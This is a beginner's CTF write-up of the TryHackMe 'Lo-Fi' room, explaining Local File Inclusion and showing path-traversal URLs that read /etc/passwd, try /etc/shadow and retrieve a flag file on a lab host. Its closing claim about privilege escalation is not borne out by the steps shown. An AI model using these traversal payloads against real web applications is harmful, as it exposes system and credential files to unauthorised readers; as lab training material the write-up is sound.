🧭 Introduction
In this post, I’ll walk you through my experience solving the Lo-Fi game on TryHackMe. This room is part of the Challenge section, which is perfect for beginners looking to understand how LFI Path Traversal works and how attackers can exploit web application weaknesses thru file inclusion.

🧩 Room Breakdown
Let's start our journey by visiting the IP shown in the challenge section. We will discover a sort of a blog application running on this ip. We are tasked to pay attention to the URL bar and how the URL string change while visiting the links provided next to the video.

Let's visit the first link called Relax and wait until the URL gets modified

The URL parameter suggests us that the site is using PHP file inclusion. This can be vulnerable and can lead to Local File Inclusion (LFI) if the input is not properly sanitized. We can get access to:

• /etc/passwd: Contains user account info (usernames, UID, home directory, shell). Passwords used to be stored here but now are in:

• /etc/shadow: Contains hashed passwords, readable only by root.

Let's craft a valid url to land to the passwd file.

http://10.10.136.146/page?=../etc/passwd

HELP TIPS: It may require from two to five times the pattern "/../" before the /etc/passwd in order to match the exact location.

Great, we score the first file, now same path, but let's look for the shadow file. I'll expect that we'll get a blank result, it will tell that we're not the root on this system.

No Admin here, ok, we cannot access this system. Let's dig for the flag, assuming that the file will be named flag.txt.

http://10.10.136.146/page?=../../../flag.txt

Good, we've managed to get the flag at first try!

📌 Final Thoughts
The Lo-Fi room is a great exercise in chaining basic enumeration with web exploitation and privilege escalation. Perfect for sharpening your CTF skills.